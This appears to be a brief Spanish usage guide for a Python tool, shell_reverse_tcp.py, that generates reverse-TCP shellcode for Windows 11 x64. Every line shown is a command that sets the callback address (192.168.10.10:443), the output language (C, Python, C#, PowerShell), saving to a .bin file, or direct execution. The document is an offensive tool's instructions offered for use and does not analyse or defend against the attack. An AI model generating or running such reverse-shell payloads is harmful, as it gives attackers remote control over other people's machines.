
Shellcodes para Windows >= 11 x64
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443
El lenguaje por defecto es shellcode tipo C; también Python, Csharp y PowerShell:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --language powershell
Para guardar el archivo:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true
El resultado predeterminado es output.bin:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true --output shellcode.bin
Para probar y ejecutar:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true
Y:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true --language powershell --save true --output shellcode.bin